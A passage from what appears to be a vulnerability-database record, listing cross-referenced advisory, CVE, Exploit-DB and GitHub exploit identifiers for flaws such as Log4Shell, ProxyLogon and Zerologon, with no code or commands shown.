{"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cve", "idList": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-3100", "CVE-2021-31196", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44530", "CVE-2021-45046", "CVE-2022-0070", "CVE-2022-23848", "CVE-2022-33915"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2463-1:1381E", "DEBIAN:DLA-2842-1:95CB4", "DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-1472", "DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-45046"]}, {"type": "dsquare", "idList": ["E-688", "E-691"]}, {"type": "exploitdb", "idList": ["EDB-ID:47287", "EDB-ID:47288", "EDB-ID:47297", "EDB-ID:48153", "EDB-ID:48168", "EDB-ID:49071", "EDB-ID:49602", "EDB-ID:49879", "EDB-ID:49895", "EDB-ID:50056", "EDB-ID:50243", "EDB-ID:50590", "EDB-ID:50592"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5", "EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05", "EXPLOITPACK:E222442D181419B052AACE6DA4BC8485"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392", "F5:K34002344", "F5:K93951507"]}, {"type": "fedora", "idList": ["FEDORA:0A343304CB93", "FEDORA:38D8230C58CD", "FEDORA:4A64830CFCDC", "FEDORA:548FD3102AB0", "FEDORA:59AA230A7074", "FEDORA:95A5B306879A", "FEDORA:A5A703103140", "FEDORA:D8A0E3053060"]}, {"type": "fireeye", "idList": ["FIREEYE:C650A7016EEAD895903FB350719E53E3", "FIREEYE:D64714BFF80E34308579150D4C839557", "FIREEYE:FC60CAB5C936FF70E94A7C9307805695"]}, {"type": "fortinet", "idList": ["FG-IR-18-384", "FG-IR-20-233", "FG-IR-21-245"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "24ACE516-FAD7-11EA-8D8C-005056A311D1", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4"]}, {"type": "gentoo", "idList": ["GLSA-202012-24"]}, {"type": "github", "idList": ["GHSA-3QPM-H9CH-PX3C", "GHSA-7RJR-3Q55-VV33", "GHSA-FP5R-V3W9-4333", "GHSA-J3CH-VJPH-8Q6V", "GHSA-J7C3-96RF-JRRP", "GHSA-JFH8-C2JP-5V3Q", "GHSA-MF4F-J588-5XM8", "GHSA-V57X-GXFJ-484Q", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "016A0841-D1FF-5056-B062-0D08FCE624CB", "0241DC13-63CB-580C-BDC6-78F8BB03567D", "030066BA-6C48-5AD9-9EAF-11DECB6A3930", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "059DC199-E425-50EE-B5F5-E351E0323E69", "066BA250-177D-5017-9AC2-6B948A465ABC", "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "07DF268C-467E-54A3-B713-057BA19C72F7", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A015784-48D7-5DC1-9FB9-416A9BBEA6D5", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C366CAA-5DE0-5E1E-98BD-503473AFAFA2", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "0CFAB531-412C-57A0-BD9E-EF072620C078", "0D23F068-44DE-5104-B4F1-A0E53C83D60F", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0DE16A64-9ACA-5BBE-A315-A3AE1B013900", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "1097EF60-FC77-5135-B92B-4A84B46FABAF", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "12E44744-1AF0-523A-ACA2-593B4D33E014", "13364575-934B-5E73-AA03-AEB6910F6AD2", "13542749-F70C-5BAA-A20C-8A464D612535", "1370FA0C-A273-5E82-9EEB-7E2E5628D23E", "13C8F5B4-D05E-5953-9263-59AE11CCD7DE", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "141F2E38-979B-50B5-B649-96785B255523", "14482532-2406-58DF-89FF-30B085015257", "14573955-860C-5947-8F2F-86347A606742", "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16C11F1E-B5B4-508E-8238-6BF3458B34D3", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "18D647E9-D7D4-5591-B16C-05D007AFD726", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "20466D13-6C5B-5326-9C8B-160E9BE37195", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "2255B39F-1B91-56F4-A323-8704808620D3", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "2481D5F6-C105-5158-B4AF-B67D7BA244A3", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "256984DC-A742-53F8-889F-2071EC134734", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27A663CD-2720-57DA-A38A-DF1FEE0D7124", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "28D42B84-AB24-5FC6-ADE1-610374D67F21", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2B297EB1-A602-5F7B-B21B-C34BC6EB4308", "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "2F792C33-6CC6-58F1-9166-4DEA421DE2C3", "2F83846E-DF16-5074-98CB-01158DE1C6C6", "3019C843-FE2F-527C-B7C1-14A1C3066721", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "31DB22CD-3492-524F-9D26-035FC1086A71", "31E7D7EA-2E1F-59D8-8BD7-81B8A4894F91", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "35A70212-DFFC-5B38-8294-2B835B8080DE", "35B21CE7-1E51-5824-B70E-36480A6E8763", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "3738D917-F6B1-5AFF-8F77-DA5EF5276D89", "37EE4A49-AEF7-5A71-AC1C-4B55CB94DD92", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "39732E15-7AF0-5FC2-851B-B63466C0F2F2", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "39EADA2B-CE50-555B-910E-D3B77640C464", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3DFE8091-03AE-565B-A198-BD509784502C", "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3F400483-1F7E-5BE5-8612-4D55D450D553", "3F8F5249-E116-59FA-9CE1-74380DCC5D51", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "42098CCD-C708-53FC-B3CD-5A8356B69359", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "43CEFD04-EB9B-5765-AB94-8FF76127F1F6", "441AE17C-8A7C-5FB8-AE3C-667A15B0265F", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "46CBB13F-0CFD-5D36-BDAB-38B8D306B155", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "4804958E-7699-5226-91C3-8110A4CBAB18", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "4987606C-EB9B-581F-913D-36468DE9160E", "49EC151F-12F0-59CF-960C-25BD54F46680", "4A0D603B-6526-5D1E-BADC-55B4775C354B", "4A85B104-7AB3-5334-BEAB-DD8CB273CBAF", "4A995433-D0C6-5BF7-9A78-962229397A7D", "4AC49DB9-A784-561B-BF92-94209310B51B", "4AE4DA23-9B19-512A-AEC4-4DDC3C1650FC", "4B070EB0-B690-5547-8809-F1A697118957", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4C6A108D-3631-56AD-8C3B-9677A228693B", "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "4DBC05D1-8178-5715-953D-61ECC89104F4", "4E59AAA3-7DBF-5E34-BD91-8F83E0E65CEB", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F57CC9C-B908-544E-92E7-92A49DE89B00", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "4FD3A97A-9BE6-5A1E-AE21-241CC188CDE7", "502CC8C9-71B8-5BB1-9D39-D1EAA861ABDA", "50618611-3CA9-5185-8ED3-53532D99D4B7", "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "52C8ABEA-CBB9-5201-A615-BBC5769F9BC3", "52E35A88-6217-55CC-B812-4EE83CECD8EB", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55989E2C-3C33-5EB8-AADF-9B52B80F48D6", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "5711B5D3-F257-5128-8C1A-908EACEAEC29", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "58ACC402-1947-5FE3-9D08-021A4EFEC48A", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "5FDC1BB6-C937-5F78-BB2D-71584272E00A", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "626E6774-0ACC-594C-BB61-E89F8F034B11", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "63C36F7A-5F99-5A79-B99F-260360AC237F", "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "64D0ED0A-E1C0-57F4-B874-CAB63E7D858C", "64EF6553-4D22-526B-A1CC-09212DBD7625", "65D56BCD-234F-52E5-9388-7D1421B31B1B", "65EB18B2-8DBB-5A70-9080-C6DA4451D7E7", "6600C311-30E5-566D-98F1-AC47E752EBEA", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "69E38911-1BFE-5166-9FD4-EC8F4997E3DE", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6B607D21-8F2D-50F9-8E60-BC95F2E252E1", "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6BCA07B7-CE6D-5F8C-9F75-D9C7E4B072FE", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D33E1F2-A0E0-5F7C-B559-054EDA21AB58", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F251270-3935-58F4-835C-C9D26FA97CD6", "6F7E4100-F6E7-5C57-8A1B-89F03DCC53A6", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "700E9EFF-DFA6-504F-8DD1-FB1A62E01721", "70582B5B-E1E6-5767-94A6-39740A96A052", "7078ED42-959E-5242-BE9D-17F2F99C76A8", "70EDCB3B-9053-5056-980C-AC3123913F04", "71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "71E27C48-EAFE-5FC0-98A4-BE7276D47449", "7275794A-F2F6-51E6-B514-185E494D8A3F", "72EF4B3F-6CF3-5E4D-9B05-D4E27A7A9D1A", "7395180E-85B1-5253-9975-F93BE4693139", "743571E7-B8EE-5E77-B047-E2E001379ACE", "75180259-16B4-5B60-9913-BFC9A306560A", "75876A50-BD9B-5991-9E42-7A343A97C890", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "76F6F494-8855-5F94-9675-4474FFFA65A1", "7758268F-2004-536A-B51F-62DA1E5A992D", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "77BE16D3-FEC9-51E3-ADB4-250D5BE6CBD2", "780AD920-FF08-55C6-84C8-A8536C6F5527", "7865A97A-CD10-5E45-9429-CF5F72A6952B", "78C2256A-8ABF-5E34-9268-2EEC0C09E567", "78CE8E59-092E-5214-9D02-A3F5F62F22E9", "7948E878-9BFE-5FEB-90AE-14C32290452F", "796841FC-B75D-5F42-B0E7-7FF15A74E5C1", "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "798FA73D-8AE9-55E5-9D2F-4CC9D9477DD9", "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "7B41BE78-EA76-5BF3-A0BC-250C3D753626", "7B48A97D-242D-55E0-8A13-BD2727C1261F", "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "7BB30379-8D57-5FD7-A90C-1A24B1846A23", "7BCC0C24-A1F7-531E-B1BA-342D21C9AF02", "7C80631A-74CB-54F0-BC26-01EEF7D52760", "7D70E261-1C9F-517E-88BB-62776C7EE1F1", "7F4F3321-8955-51B4-B195-7C1F647A6C84", "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "8021D807-3EDC-55A7-A9ED-A364159FADEE", "817FB04E-AFFE-567B-8A2C-64C0A8923734", "81A94AF3-F3C2-5DAE-9C64-154CF9502B01", "81FEB23C-D090-5CE8-9B92-00BE597DE052", "84D5F04A-0DDB-5788-8759-DA99D303B756", "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "867C95E5-9596-5E6D-BC2F-FC7A610F3A3E", "8697646B-BC1C-5EEB-84C6-2F209E41B64E", "86CE8F3E-1859-58C8-97B5-8D53531EE22A", "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "879CF3A7-ECBC-552A-A044-5E2724F63279", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "8C937DCD-4090-5A44-9361-4D9ECF545843", "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "8D604793-908D-5C35-A3EF-6D2688A10312", "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "8E16065C-63FB-554A-B463-A1E8582A334F", "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "8F15A064-7841-5899-84CE-8C298A269F83", "8F362564-1631-5AF9-BB38-D1BFC4678DAE", "8FB716EC-9A35-5F93-9759-B27A58B52CF8", "91C28663-6C3C-5E4F-B609-44E5804E4A83", "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "926942FE-1507-5B71-9266-0A5EDC38EE50", "9297A534-2B19-597A-8952-6EC15EE80BFF", "931205E1-36E0-52BF-A978-D4C326F6A32A", "9326CB66-BADC-5643-B118-F38C39A9E34C", "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "939F3BE7-AF69-5351-BD56-12412FA184C5", "945E86E8-E114-5F51-991C-13742C6EF49E", "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "94966928-86D4-5285-9A57-CBDD8F2EF438", "94A8FFF1-6A48-57CB-9340-D6806F47EFA0", "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "95033F5C-FFFE-58C2-9799-C77E326ACD83", "952CB700-FA2F-5221-96B9-2656F967B63E", "958F00F1-C4FC-5213-82EA-290A530F859B", "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "97D358EF-90F6-5D12-981B-DAFEB56F784F", "97F1C960-A343-5B1E-B261-4834CF80B790", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "9B0163DC-EE41-5E66-9AA8-A960262A2072", "9C3150AA-6C0C-5DC4-BEAD-C807FA5ACE12", "9C9BD402-511C-597D-9864-647131FE6647", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9E82678F-0559-56B2-94DC-6505FE64555C", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A19F503A-900B-5929-8182-4BD7B1043185", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "A32F9E91-783B-5C20-9630-6A4E3DDA9AFF", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "A57FBD78-A654-5CEE-8291-163C8AFB7210", "A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", "A7CA20BB-BCF9-52C0-A708-01F9ADECB1AC", "A9A21055-01FA-5B3E-84B3-E294A9641418", "AAC2853C-A655-5E80-9262-A654102B874A", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "AC9BE6BA-8352-57D6-80E3-8BB62A0D31C2", "ACB6C453-F1D5-5A65-91C2-DF455B997075", "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "AF45C6B5-246A-5363-8436-954018BD121C", "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "AF93C0CA-BFDD-5C90-9D8D-55350790E1D1", "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B09C4EFC-2C66-5CA8-910F-E21D17B89608", "B16D26DB-D60C-5C0C-9452-80112720B442", "B20A08C3-E06C-57C9-998A-C38174AEA7DC", "B22E3A22-BF14-5660-977A-2D28D2AA2500", "B32ED3B3-2054-5776-B952-907BE2CBEED6", "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "B4A4F7BE-BF43-5BB6-A4A7-A22C6B9DDCA5", "B596B144-65DB-5863-8244-67AEE883C50E", "B5E7199E-37EE-5CBA-A8B7-83061DD63E3D", "B6987F3B-86A1-5FDC-AD92-EAF6D264C14A", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "B8D5B910-B397-520E-9526-FE32D86E93D8", "B992B3E1-DF6B-5594-8A16-ED385E07A24C", "B9A69678-D96F-528D-B436-366259B4A283", "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "BA8F1657-CF64-574C-81BA-6432D5A351D4", "BADF55AF-60C5-5E33-BC19-5DC25FB9E196", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BD1B0180-DA8D-5255-B3FE-EB6CBC730206", "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "BE2B1B45-11AE-56F2-A5B4-2497BAE3B016", "BE4B2B71-B588-5666-9A02-7855DBD45762", "BE66A9B6-104B-5F49-918A-8B913CE46473", "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "BFA4DC64-759A-5113-842C-923C98D12B44", "BFB49B3A-706B-5625-9899-54FCB1EE767B", "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "C0AE83D0-09A6-58EA-A244-1E453E699C04", "C14C47DA-F04C-56CC-955A-FF12A410D2F5", "C1878361-BBB3-5A2F-8212-945883518690", "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "C306DCEF-59B3-5147-8169-3674490BD35F", "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "C3C6029E-8A78-5C0B-9CF6-51489E455464", "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "C3E394AB-E22C-5A6A-B5AF-2A497DDAC7BA", "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C5531AD4-9DFE-5A81-97D2-D34FD02E2AD6", "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "C640B511-D1E9-5F57-964D-3826F1C68DF8", "C68080B0-3163-5E76-AD65-2B454DBB95EE", "C6C5DB3A-FC0D-58BE-B769-D097420B7716", "C72759ED-7C42-593C-A3C7-94E2CDB2B105", "C7617E51-4166-5517-879D-6385309E13D8", "C76F7089-967B-5A7F-B8DA-629452876A2A", "C772DCBB-20D0-51DD-A580-F96689E65773", "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "C7EE8D86-B287-50F5-B8C2-05E11E510900", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "C87EF7D4-0E85-54CD-9D5A-381C451E5511", "C96865D9-B80D-5799-9EB6-DDF13650F0AA", "C98B31E5-B85D-50EE-9596-F00F1B89A800", "C9E3963C-74AF-51D2-ACF7-7687E92D049F", "CA408205-D32D-5A33-B1AF-0B863641C7FC", "CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB", "CA8D6F85-3A73-5070-B9A0-3A47FAE2C784", "CB9B5FAA-47CA-5D85-91B9-0AC5179D527B", 